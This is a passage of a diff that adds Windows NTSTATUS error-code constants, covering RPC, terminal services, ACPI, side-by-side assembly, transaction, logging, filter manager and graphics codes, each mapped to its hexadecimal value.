+RPC_NT_NO_PROTSEQS_REGISTERED = 0xC002000F
+RPC_NT_NOT_LISTENING = 0xC0020010
+RPC_NT_UNKNOWN_MGR_TYPE = 0xC0020011
+RPC_NT_UNKNOWN_IF = 0xC0020012
+RPC_NT_NO_BINDINGS = 0xC0020013
+RPC_NT_NO_PROTSEQS = 0xC0020014
+RPC_NT_CANT_CREATE_ENDPOINT = 0xC0020015
+RPC_NT_OUT_OF_RESOURCES = 0xC0020016
+RPC_NT_SERVER_UNAVAILABLE = 0xC0020017
+RPC_NT_SERVER_TOO_BUSY = 0xC0020018
+RPC_NT_INVALID_NETWORK_OPTIONS = 0xC0020019
+RPC_NT_NO_CALL_ACTIVE = 0xC002001A
+RPC_NT_CALL_FAILED = 0xC002001B
+RPC_NT_CALL_FAILED_DNE = 0xC002001C
+RPC_NT_PROTOCOL_ERROR = 0xC002001D
+RPC_NT_UNSUPPORTED_TRANS_SYN = 0xC002001F
+RPC_NT_UNSUPPORTED_TYPE = 0xC0020021
+RPC_NT_INVALID_TAG = 0xC0020022
+RPC_NT_INVALID_BOUND = 0xC0020023
+RPC_NT_NO_ENTRY_NAME = 0xC0020024
+RPC_NT_INVALID_NAME_SYNTAX = 0xC0020025
+RPC_NT_UNSUPPORTED_NAME_SYNTAX = 0xC0020026
+RPC_NT_UUID_NO_ADDRESS = 0xC0020028
+RPC_NT_DUPLICATE_ENDPOINT = 0xC0020029
+RPC_NT_UNKNOWN_AUTHN_TYPE = 0xC002002A
+RPC_NT_MAX_CALLS_TOO_SMALL = 0xC002002B
+RPC_NT_STRING_TOO_LONG = 0xC002002C
+RPC_NT_PROTSEQ_NOT_FOUND = 0xC002002D
+RPC_NT_PROCNUM_OUT_OF_RANGE = 0xC002002E
+RPC_NT_BINDING_HAS_NO_AUTH = 0xC002002F
+RPC_NT_UNKNOWN_AUTHN_SERVICE = 0xC0020030
+RPC_NT_UNKNOWN_AUTHN_LEVEL = 0xC0020031
+RPC_NT_INVALID_AUTH_IDENTITY = 0xC0020032
+RPC_NT_UNKNOWN_AUTHZ_SERVICE = 0xC0020033
+EPT_NT_INVALID_ENTRY = 0xC0020034
+EPT_NT_CANT_PERFORM_OP = 0xC0020035
+EPT_NT_NOT_REGISTERED = 0xC0020036
+RPC_NT_NOTHING_TO_EXPORT = 0xC0020037
+RPC_NT_INCOMPLETE_NAME = 0xC0020038
+RPC_NT_INVALID_VERS_OPTION = 0xC0020039
+RPC_NT_NO_MORE_MEMBERS = 0xC002003A
+RPC_NT_NOT_ALL_OBJS_UNEXPORTED = 0xC002003B
+RPC_NT_INTERFACE_NOT_FOUND = 0xC002003C
+RPC_NT_ENTRY_ALREADY_EXISTS = 0xC002003D
+RPC_NT_ENTRY_NOT_FOUND = 0xC002003E
+RPC_NT_NAME_SERVICE_UNAVAILABLE = 0xC002003F
+RPC_NT_INVALID_NAF_ID = 0xC0020040
+RPC_NT_CANNOT_SUPPORT = 0xC0020041
+RPC_NT_NO_CONTEXT_AVAILABLE = 0xC0020042
+RPC_NT_INTERNAL_ERROR = 0xC0020043
+RPC_NT_ZERO_DIVIDE = 0xC0020044
+RPC_NT_ADDRESS_ERROR = 0xC0020045
+RPC_NT_FP_DIV_ZERO = 0xC0020046
+RPC_NT_FP_UNDERFLOW = 0xC0020047
+RPC_NT_FP_OVERFLOW = 0xC0020048
+RPC_NT_CALL_IN_PROGRESS = 0xC0020049
+RPC_NT_NO_MORE_BINDINGS = 0xC002004A
+RPC_NT_GROUP_MEMBER_NOT_FOUND = 0xC002004B
+EPT_NT_CANT_CREATE = 0xC002004C
+RPC_NT_INVALID_OBJECT = 0xC002004D
+RPC_NT_NO_INTERFACES = 0xC002004F
+RPC_NT_CALL_CANCELLED = 0xC0020050
+RPC_NT_BINDING_INCOMPLETE = 0xC0020051
+RPC_NT_COMM_FAILURE = 0xC0020052
+RPC_NT_UNSUPPORTED_AUTHN_LEVEL = 0xC0020053
+RPC_NT_NO_PRINC_NAME = 0xC0020054
+RPC_NT_NOT_RPC_ERROR = 0xC0020055
+RPC_NT_SEC_PKG_ERROR = 0xC0020057
+RPC_NT_NOT_CANCELLED = 0xC0020058
+RPC_NT_INVALID_ASYNC_HANDLE = 0xC0020062
+RPC_NT_INVALID_ASYNC_CALL = 0xC0020063
+RPC_NT_PROXY_ACCESS_DENIED = 0xC0020064
+RPC_P_RECEIVE_ALERTED = 0xC0021007
+RPC_P_CONNECTION_CLOSED = 0xC0021008
+RPC_P_RECEIVE_FAILED = 0xC0021009
+RPC_P_SEND_FAILED = 0xC002100A
+RPC_P_TIMEOUT = 0xC002100B
+RPC_P_SERVER_TRANSPORT_ERROR = 0xC002100C
+RPC_P_EXCEPTION_OCCURED = 0xC002100E
+RPC_P_CONNECTION_SHUTDOWN = 0xC0021012
+RPC_P_THREAD_LISTENING = 0xC0021015
+RPC_NT_NO_MORE_ENTRIES = 0xC0030001
+RPC_NT_SS_CHAR_TRANS_OPEN_FAIL = 0xC0030002
+RPC_NT_SS_CHAR_TRANS_SHORT_FILE = 0xC0030003
+RPC_NT_SS_IN_NULL_CONTEXT = 0xC0030004
+RPC_NT_SS_CONTEXT_MISMATCH = 0xC0030005
+RPC_NT_SS_CONTEXT_DAMAGED = 0xC0030006
+RPC_NT_SS_HANDLES_MISMATCH = 0xC0030007
+RPC_NT_SS_CANNOT_GET_CALL_HANDLE = 0xC0030008
+RPC_NT_NULL_REF_POINTER = 0xC0030009
+RPC_NT_ENUM_VALUE_OUT_OF_RANGE = 0xC003000A
+RPC_NT_BYTE_COUNT_TOO_SMALL = 0xC003000B
+RPC_NT_BAD_STUB_DATA = 0xC003000C
+RPC_NT_INVALID_ES_ACTION = 0xC0030059
+RPC_NT_WRONG_ES_VERSION = 0xC003005A
+RPC_NT_WRONG_STUB_VERSION = 0xC003005B
+RPC_NT_INVALID_PIPE_OBJECT = 0xC003005C
+RPC_NT_INVALID_PIPE_OPERATION = 0xC003005D
+RPC_NT_WRONG_PIPE_VERSION = 0xC003005E
+RPC_NT_PIPE_CLOSED = 0xC003005F
+RPC_NT_PIPE_DISCIPLINE_ERROR = 0xC0030060
+RPC_NT_PIPE_EMPTY = 0xC0030061
+STATUS_PNP_BAD_MPS_TABLE = 0xC0040035
+STATUS_PNP_TRANSLATION_FAILED = 0xC0040036
+STATUS_PNP_IRQ_TRANSLATION_FAILED = 0xC0040037
+STATUS_PNP_INVALID_ID = 0xC0040038
+STATUS_IO_REISSUE_AS_CACHED = 0xC0040039
+STATUS_CTX_WINSTATION_NAME_INVALID = 0xC00A0001
+STATUS_CTX_INVALID_PD = 0xC00A0002
+STATUS_CTX_PD_NOT_FOUND = 0xC00A0003
+STATUS_CTX_CLOSE_PENDING = 0xC00A0006
+STATUS_CTX_NO_OUTBUF = 0xC00A0007
+STATUS_CTX_MODEM_INF_NOT_FOUND = 0xC00A0008
+STATUS_CTX_INVALID_MODEMNAME = 0xC00A0009
+STATUS_CTX_RESPONSE_ERROR = 0xC00A000A
+STATUS_CTX_MODEM_RESPONSE_TIMEOUT = 0xC00A000B
+STATUS_CTX_MODEM_RESPONSE_NO_CARRIER = 0xC00A000C
+STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE = 0xC00A000D
+STATUS_CTX_MODEM_RESPONSE_BUSY = 0xC00A000E
+STATUS_CTX_MODEM_RESPONSE_VOICE = 0xC00A000F
+STATUS_CTX_TD_ERROR = 0xC00A0010
+STATUS_CTX_LICENSE_CLIENT_INVALID = 0xC00A0012
+STATUS_CTX_LICENSE_NOT_AVAILABLE = 0xC00A0013
+STATUS_CTX_LICENSE_EXPIRED = 0xC00A0014
+STATUS_CTX_WINSTATION_NOT_FOUND = 0xC00A0015
+STATUS_CTX_WINSTATION_NAME_COLLISION = 0xC00A0016
+STATUS_CTX_WINSTATION_BUSY = 0xC00A0017
+STATUS_CTX_BAD_VIDEO_MODE = 0xC00A0018
+STATUS_CTX_GRAPHICS_INVALID = 0xC00A0022
+STATUS_CTX_NOT_CONSOLE = 0xC00A0024
+STATUS_CTX_CLIENT_QUERY_TIMEOUT = 0xC00A0026
+STATUS_CTX_CONSOLE_DISCONNECT = 0xC00A0027
+STATUS_CTX_CONSOLE_CONNECT = 0xC00A0028
+STATUS_CTX_SHADOW_DENIED = 0xC00A002A
+STATUS_CTX_WINSTATION_ACCESS_DENIED = 0xC00A002B
+STATUS_CTX_INVALID_WD = 0xC00A002E
+STATUS_CTX_WD_NOT_FOUND = 0xC00A002F
+STATUS_CTX_SHADOW_INVALID = 0xC00A0030
+STATUS_CTX_SHADOW_DISABLED = 0xC00A0031
+STATUS_RDP_PROTOCOL_ERROR = 0xC00A0032
+STATUS_CTX_CLIENT_LICENSE_NOT_SET = 0xC00A0033
+STATUS_CTX_CLIENT_LICENSE_IN_USE = 0xC00A0034
+STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0xC00A0035
+STATUS_CTX_SHADOW_NOT_RUNNING = 0xC00A0036
+STATUS_CTX_LOGON_DISABLED = 0xC00A0037
+STATUS_CTX_SECURITY_LAYER_ERROR = 0xC00A0038
+STATUS_TS_INCOMPATIBLE_SESSIONS = 0xC00A0039
+STATUS_MUI_FILE_NOT_FOUND = 0xC00B0001
+STATUS_MUI_INVALID_FILE = 0xC00B0002
+STATUS_MUI_INVALID_RC_CONFIG = 0xC00B0003
+STATUS_MUI_INVALID_LOCALE_NAME = 0xC00B0004
+STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME = 0xC00B0005
+STATUS_MUI_FILE_NOT_LOADED = 0xC00B0006
+STATUS_RESOURCE_ENUM_USER_STOP = 0xC00B0007
+STATUS_CLUSTER_INVALID_NODE = 0xC0130001
+STATUS_CLUSTER_NODE_EXISTS = 0xC0130002
+STATUS_CLUSTER_JOIN_IN_PROGRESS = 0xC0130003
+STATUS_CLUSTER_NODE_NOT_FOUND = 0xC0130004
+STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND = 0xC0130005
+STATUS_CLUSTER_NETWORK_EXISTS = 0xC0130006
+STATUS_CLUSTER_NETWORK_NOT_FOUND = 0xC0130007
+STATUS_CLUSTER_NETINTERFACE_EXISTS = 0xC0130008
+STATUS_CLUSTER_NETINTERFACE_NOT_FOUND = 0xC0130009
+STATUS_CLUSTER_INVALID_REQUEST = 0xC013000A
+STATUS_CLUSTER_INVALID_NETWORK_PROVIDER = 0xC013000B
+STATUS_CLUSTER_NODE_DOWN = 0xC013000C
+STATUS_CLUSTER_NODE_UNREACHABLE = 0xC013000D
+STATUS_CLUSTER_NODE_NOT_MEMBER = 0xC013000E
+STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS = 0xC013000F
+STATUS_CLUSTER_INVALID_NETWORK = 0xC0130010
+STATUS_CLUSTER_NO_NET_ADAPTERS = 0xC0130011
+STATUS_CLUSTER_NODE_UP = 0xC0130012
+STATUS_CLUSTER_NODE_PAUSED = 0xC0130013
+STATUS_CLUSTER_NODE_NOT_PAUSED = 0xC0130014
+STATUS_CLUSTER_NO_SECURITY_CONTEXT = 0xC0130015
+STATUS_CLUSTER_NETWORK_NOT_INTERNAL = 0xC0130016
+STATUS_CLUSTER_POISONED = 0xC0130017
+STATUS_ACPI_INVALID_OPCODE = 0xC0140001
+STATUS_ACPI_STACK_OVERFLOW = 0xC0140002
+STATUS_ACPI_ASSERT_FAILED = 0xC0140003
+STATUS_ACPI_INVALID_INDEX = 0xC0140004
+STATUS_ACPI_INVALID_ARGUMENT = 0xC0140005
+STATUS_ACPI_FATAL = 0xC0140006
+STATUS_ACPI_INVALID_SUPERNAME = 0xC0140007
+STATUS_ACPI_INVALID_ARGTYPE = 0xC0140008
+STATUS_ACPI_INVALID_OBJTYPE = 0xC0140009
+STATUS_ACPI_INVALID_TARGETTYPE = 0xC014000A
+STATUS_ACPI_INCORRECT_ARGUMENT_COUNT = 0xC014000B
+STATUS_ACPI_ADDRESS_NOT_MAPPED = 0xC014000C
+STATUS_ACPI_INVALID_EVENTTYPE = 0xC014000D
+STATUS_ACPI_HANDLER_COLLISION = 0xC014000E
+STATUS_ACPI_INVALID_DATA = 0xC014000F
+STATUS_ACPI_INVALID_REGION = 0xC0140010
+STATUS_ACPI_INVALID_ACCESS_SIZE = 0xC0140011
+STATUS_ACPI_ACQUIRE_GLOBAL_LOCK = 0xC0140012
+STATUS_ACPI_ALREADY_INITIALIZED = 0xC0140013
+STATUS_ACPI_NOT_INITIALIZED = 0xC0140014
+STATUS_ACPI_INVALID_MUTEX_LEVEL = 0xC0140015
+STATUS_ACPI_MUTEX_NOT_OWNED = 0xC0140016
+STATUS_ACPI_MUTEX_NOT_OWNER = 0xC0140017
+STATUS_ACPI_RS_ACCESS = 0xC0140018
+STATUS_ACPI_INVALID_TABLE = 0xC0140019
+STATUS_ACPI_REG_HANDLER_FAILED = 0xC0140020
+STATUS_ACPI_POWER_REQUEST_FAILED = 0xC0140021
+STATUS_SXS_SECTION_NOT_FOUND = 0xC0150001
+STATUS_SXS_CANT_GEN_ACTCTX = 0xC0150002
+STATUS_SXS_INVALID_ACTCTXDATA_FORMAT = 0xC0150003
+STATUS_SXS_ASSEMBLY_NOT_FOUND = 0xC0150004
+STATUS_SXS_MANIFEST_FORMAT_ERROR = 0xC0150005
+STATUS_SXS_MANIFEST_PARSE_ERROR = 0xC0150006
+STATUS_SXS_ACTIVATION_CONTEXT_DISABLED = 0xC0150007
+STATUS_SXS_KEY_NOT_FOUND = 0xC0150008
+STATUS_SXS_VERSION_CONFLICT = 0xC0150009
+STATUS_SXS_WRONG_SECTION_TYPE = 0xC015000A
+STATUS_SXS_THREAD_QUERIES_DISABLED = 0xC015000B
+STATUS_SXS_ASSEMBLY_MISSING = 0xC015000C
+STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET = 0xC015000E
+STATUS_SXS_EARLY_DEACTIVATION = 0xC015000F
+STATUS_SXS_INVALID_DEACTIVATION = 0xC0150010
+STATUS_SXS_MULTIPLE_DEACTIVATION = 0xC0150011
+STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0xC0150012
+STATUS_SXS_PROCESS_TERMINATION_REQUESTED = 0xC0150013
+STATUS_SXS_CORRUPT_ACTIVATION_STACK = 0xC0150014
+STATUS_SXS_CORRUPTION = 0xC0150015
+STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0xC0150016
+STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0xC0150017
+STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0xC0150018
+STATUS_SXS_IDENTITY_PARSE_ERROR = 0xC0150019
+STATUS_SXS_COMPONENT_STORE_CORRUPT = 0xC015001A
+STATUS_SXS_FILE_HASH_MISMATCH = 0xC015001B
+STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0xC015001C
+STATUS_SXS_IDENTITIES_DIFFERENT = 0xC015001D
+STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0xC015001E
+STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY = 0xC015001F
+STATUS_ADVANCED_INSTALLER_FAILED = 0xC0150020
+STATUS_XML_ENCODING_MISMATCH = 0xC0150021
+STATUS_SXS_MANIFEST_TOO_BIG = 0xC0150022
+STATUS_SXS_SETTING_NOT_REGISTERED = 0xC0150023
+STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0xC0150024
+STATUS_SMI_PRIMITIVE_INSTALLER_FAILED = 0xC0150025
+STATUS_GENERIC_COMMAND_FAILED = 0xC0150026
+STATUS_SXS_FILE_HASH_MISSING = 0xC0150027
+STATUS_TRANSACTIONAL_CONFLICT = 0xC0190001
+STATUS_INVALID_TRANSACTION = 0xC0190002
+STATUS_TRANSACTION_NOT_ACTIVE = 0xC0190003
+STATUS_TM_INITIALIZATION_FAILED = 0xC0190004
+STATUS_RM_NOT_ACTIVE = 0xC0190005
+STATUS_RM_METADATA_CORRUPT = 0xC0190006
+STATUS_TRANSACTION_NOT_JOINED = 0xC0190007
+STATUS_DIRECTORY_NOT_RM = 0xC0190008
+STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE = 0xC019000A
+STATUS_LOG_RESIZE_INVALID_SIZE = 0xC019000B
+STATUS_REMOTE_FILE_VERSION_MISMATCH = 0xC019000C
+STATUS_CRM_PROTOCOL_ALREADY_EXISTS = 0xC019000F
+STATUS_TRANSACTION_PROPAGATION_FAILED = 0xC0190010
+STATUS_CRM_PROTOCOL_NOT_FOUND = 0xC0190011
+STATUS_TRANSACTION_SUPERIOR_EXISTS = 0xC0190012
+STATUS_TRANSACTION_REQUEST_NOT_VALID = 0xC0190013
+STATUS_TRANSACTION_NOT_REQUESTED = 0xC0190014
+STATUS_TRANSACTION_ALREADY_ABORTED = 0xC0190015
+STATUS_TRANSACTION_ALREADY_COMMITTED = 0xC0190016
+STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER = 0xC0190017
+STATUS_CURRENT_TRANSACTION_NOT_VALID = 0xC0190018
+STATUS_LOG_GROWTH_FAILED = 0xC0190019
+STATUS_OBJECT_NO_LONGER_EXISTS = 0xC0190021
+STATUS_STREAM_MINIVERSION_NOT_FOUND = 0xC0190022
+STATUS_STREAM_MINIVERSION_NOT_VALID = 0xC0190023
+STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0xC0190024
+STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0xC0190025
+STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0xC0190026
+STATUS_HANDLE_NO_LONGER_VALID = 0xC0190028
+STATUS_LOG_CORRUPTION_DETECTED = 0xC0190030
+STATUS_RM_DISCONNECTED = 0xC0190032
+STATUS_ENLISTMENT_NOT_SUPERIOR = 0xC0190033
+STATUS_FILE_IDENTITY_NOT_PERSISTENT = 0xC0190036
+STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0xC0190037
+STATUS_CANT_CROSS_RM_BOUNDARY = 0xC0190038
+STATUS_TXF_DIR_NOT_EMPTY = 0xC0190039
+STATUS_INDOUBT_TRANSACTIONS_EXIST = 0xC019003A
+STATUS_TM_VOLATILE = 0xC019003B
+STATUS_ROLLBACK_TIMER_EXPIRED = 0xC019003C
+STATUS_TXF_ATTRIBUTE_CORRUPT = 0xC019003D
+STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION = 0xC019003E
+STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED = 0xC019003F
+STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0xC0190040
+STATUS_TRANSACTION_REQUIRED_PROMOTION = 0xC0190043
+STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0xC0190044
+STATUS_TRANSACTIONS_NOT_FROZEN = 0xC0190045
+STATUS_TRANSACTION_FREEZE_IN_PROGRESS = 0xC0190046
+STATUS_NOT_SNAPSHOT_VOLUME = 0xC0190047
+STATUS_NO_SAVEPOINT_WITH_OPEN_FILES = 0xC0190048
+STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0xC0190049
+STATUS_TM_IDENTITY_MISMATCH = 0xC019004A
+STATUS_FLOATED_SECTION = 0xC019004B
+STATUS_CANNOT_ACCEPT_TRANSACTED_WORK = 0xC019004C
+STATUS_CANNOT_ABORT_TRANSACTIONS = 0xC019004D
+STATUS_TRANSACTION_NOT_FOUND = 0xC019004E
+STATUS_RESOURCEMANAGER_NOT_FOUND = 0xC019004F
+STATUS_ENLISTMENT_NOT_FOUND = 0xC0190050
+STATUS_TRANSACTIONMANAGER_NOT_FOUND = 0xC0190051
+STATUS_TRANSACTIONMANAGER_NOT_ONLINE = 0xC0190052
+STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0xC0190053
+STATUS_TRANSACTION_NOT_ROOT = 0xC0190054
+STATUS_TRANSACTION_OBJECT_EXPIRED = 0xC0190055
+STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0xC0190056
+STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED = 0xC0190057
+STATUS_TRANSACTION_RECORD_TOO_LONG = 0xC0190058
+STATUS_NO_LINK_TRACKING_IN_TRANSACTION = 0xC0190059
+STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0xC019005A
+STATUS_TRANSACTION_INTEGRITY_VIOLATED = 0xC019005B
+STATUS_EXPIRED_HANDLE = 0xC0190060
+STATUS_TRANSACTION_NOT_ENLISTED = 0xC0190061
+STATUS_LOG_SECTOR_INVALID = 0xC01A0001
+STATUS_LOG_SECTOR_PARITY_INVALID = 0xC01A0002
+STATUS_LOG_SECTOR_REMAPPED = 0xC01A0003
+STATUS_LOG_BLOCK_INCOMPLETE = 0xC01A0004
+STATUS_LOG_INVALID_RANGE = 0xC01A0005
+STATUS_LOG_BLOCKS_EXHAUSTED = 0xC01A0006
+STATUS_LOG_READ_CONTEXT_INVALID = 0xC01A0007
+STATUS_LOG_RESTART_INVALID = 0xC01A0008
+STATUS_LOG_BLOCK_VERSION = 0xC01A0009
+STATUS_LOG_BLOCK_INVALID = 0xC01A000A
+STATUS_LOG_READ_MODE_INVALID = 0xC01A000B
+STATUS_LOG_METADATA_CORRUPT = 0xC01A000D
+STATUS_LOG_METADATA_INVALID = 0xC01A000E
+STATUS_LOG_METADATA_INCONSISTENT = 0xC01A000F
+STATUS_LOG_RESERVATION_INVALID = 0xC01A0010
+STATUS_LOG_CANT_DELETE = 0xC01A0011
+STATUS_LOG_CONTAINER_LIMIT_EXCEEDED = 0xC01A0012
+STATUS_LOG_START_OF_LOG = 0xC01A0013
+STATUS_LOG_POLICY_ALREADY_INSTALLED = 0xC01A0014
+STATUS_LOG_POLICY_NOT_INSTALLED = 0xC01A0015
+STATUS_LOG_POLICY_INVALID = 0xC01A0016
+STATUS_LOG_POLICY_CONFLICT = 0xC01A0017
+STATUS_LOG_PINNED_ARCHIVE_TAIL = 0xC01A0018
+STATUS_LOG_RECORD_NONEXISTENT = 0xC01A0019
+STATUS_LOG_RECORDS_RESERVED_INVALID = 0xC01A001A
+STATUS_LOG_SPACE_RESERVED_INVALID = 0xC01A001B
+STATUS_LOG_TAIL_INVALID = 0xC01A001C
+STATUS_LOG_FULL = 0xC01A001D
+STATUS_LOG_MULTIPLEXED = 0xC01A001E
+STATUS_LOG_DEDICATED = 0xC01A001F
+STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS = 0xC01A0020
+STATUS_LOG_ARCHIVE_IN_PROGRESS = 0xC01A0021
+STATUS_LOG_EPHEMERAL = 0xC01A0022
+STATUS_LOG_NOT_ENOUGH_CONTAINERS = 0xC01A0023
+STATUS_LOG_CLIENT_ALREADY_REGISTERED = 0xC01A0024
+STATUS_LOG_CLIENT_NOT_REGISTERED = 0xC01A0025
+STATUS_LOG_FULL_HANDLER_IN_PROGRESS = 0xC01A0026
+STATUS_LOG_CONTAINER_READ_FAILED = 0xC01A0027
+STATUS_LOG_CONTAINER_WRITE_FAILED = 0xC01A0028
+STATUS_LOG_CONTAINER_OPEN_FAILED = 0xC01A0029
+STATUS_LOG_CONTAINER_STATE_INVALID = 0xC01A002A
+STATUS_LOG_STATE_INVALID = 0xC01A002B
+STATUS_LOG_PINNED = 0xC01A002C
+STATUS_LOG_METADATA_FLUSH_FAILED = 0xC01A002D
+STATUS_LOG_INCONSISTENT_SECURITY = 0xC01A002E
+STATUS_LOG_APPENDED_FLUSH_FAILED = 0xC01A002F
+STATUS_LOG_PINNED_RESERVATION = 0xC01A0030
+STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD = 0xC01B00EA
+STATUS_FLT_NO_HANDLER_DEFINED = 0xC01C0001
+STATUS_FLT_CONTEXT_ALREADY_DEFINED = 0xC01C0002
+STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST = 0xC01C0003
+STATUS_FLT_DISALLOW_FAST_IO = 0xC01C0004
+STATUS_FLT_INVALID_NAME_REQUEST = 0xC01C0005
+STATUS_FLT_NOT_SAFE_TO_POST_OPERATION = 0xC01C0006
+STATUS_FLT_NOT_INITIALIZED = 0xC01C0007
+STATUS_FLT_FILTER_NOT_READY = 0xC01C0008
+STATUS_FLT_POST_OPERATION_CLEANUP = 0xC01C0009
+STATUS_FLT_INTERNAL_ERROR = 0xC01C000A
+STATUS_FLT_DELETING_OBJECT = 0xC01C000B
+STATUS_FLT_MUST_BE_NONPAGED_POOL = 0xC01C000C
+STATUS_FLT_DUPLICATE_ENTRY = 0xC01C000D
+STATUS_FLT_CBDQ_DISABLED = 0xC01C000E
+STATUS_FLT_DO_NOT_ATTACH = 0xC01C000F
+STATUS_FLT_DO_NOT_DETACH = 0xC01C0010
+STATUS_FLT_INSTANCE_ALTITUDE_COLLISION = 0xC01C0011
+STATUS_FLT_INSTANCE_NAME_COLLISION = 0xC01C0012
+STATUS_FLT_FILTER_NOT_FOUND = 0xC01C0013
+STATUS_FLT_VOLUME_NOT_FOUND = 0xC01C0014
+STATUS_FLT_INSTANCE_NOT_FOUND = 0xC01C0015
+STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND = 0xC01C0016
+STATUS_FLT_INVALID_CONTEXT_REGISTRATION = 0xC01C0017
+STATUS_FLT_NAME_CACHE_MISS = 0xC01C0018
+STATUS_FLT_NO_DEVICE_OBJECT = 0xC01C0019
+STATUS_FLT_VOLUME_ALREADY_MOUNTED = 0xC01C001A
+STATUS_FLT_ALREADY_ENLISTED = 0xC01C001B
+STATUS_FLT_CONTEXT_ALREADY_LINKED = 0xC01C001C
+STATUS_FLT_NO_WAITER_FOR_REPLY = 0xC01C0020
+STATUS_MONITOR_NO_DESCRIPTOR = 0xC01D0001
+STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT = 0xC01D0002
+STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM = 0xC01D0003
+STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK = 0xC01D0004
+STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED = 0xC01D0005
+STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK = 0xC01D0006
+STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK = 0xC01D0007
+STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA = 0xC01D0008
+STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK = 0xC01D0009
+STATUS_MONITOR_INVALID_MANUFACTURE_DATE = 0xC01D000A
+STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER = 0xC01E0000
+STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER = 0xC01E0001
+STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER = 0xC01E0002
+STATUS_GRAPHICS_ADAPTER_WAS_RESET = 0xC01E0003
+STATUS_GRAPHICS_INVALID_DRIVER_MODEL = 0xC01E0004
+STATUS_GRAPHICS_PRESENT_MODE_CHANGED = 0xC01E0005
+STATUS_GRAPHICS_PRESENT_OCCLUDED = 0xC01E0006
+STATUS_GRAPHICS_PRESENT_DENIED = 0xC01E0007
+STATUS_GRAPHICS_CANNOTCOLORCONVERT = 0xC01E0008
+STATUS_GRAPHICS_PRESENT_REDIRECTION_DISABLED = 0xC01E000B
+STATUS_GRAPHICS_PRESENT_UNOCCLUDED = 0xC01E000C
+STATUS_GRAPHICS_NO_VIDEO_MEMORY = 0xC01E0100
+STATUS_GRAPHICS_CANT_LOCK_MEMORY = 0xC01E0101
+STATUS_GRAPHICS_ALLOCATION_BUSY = 0xC01E0102
+STATUS_GRAPHICS_TOO_MANY_REFERENCES = 0xC01E0103
+STATUS_GRAPHICS_TRY_AGAIN_LATER = 0xC01E0104
+STATUS_GRAPHICS_TRY_AGAIN_NOW = 0xC01E0105
+STATUS_GRAPHICS_ALLOCATION_INVALID = 0xC01E0106
+STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE = 0xC01E0107
+STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED = 0xC01E0108
+STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION = 0xC01E0109
+STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE = 0xC01E0110
+STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION = 0xC01E0111
+STATUS_GRAPHICS_ALLOCATION_CLOSED = 0xC01E0112
+STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE = 0xC01E0113
+STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE = 0xC01E0114
+STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE = 0xC01E0115
+STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST = 0xC01E0116
+STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE = 0xC01E0200
+STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY = 0xC01E0300
+STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED = 0xC01E0301
+STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED = 0xC01E0302
+STATUS_GRAPHICS_INVALID_VIDPN = 0xC01E0303
+STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE = 0xC01E0304
+STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET = 0xC01E0305
+STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED = 0xC01E0306
+STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET = 0xC01E0308
+STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET = 0xC01E0309
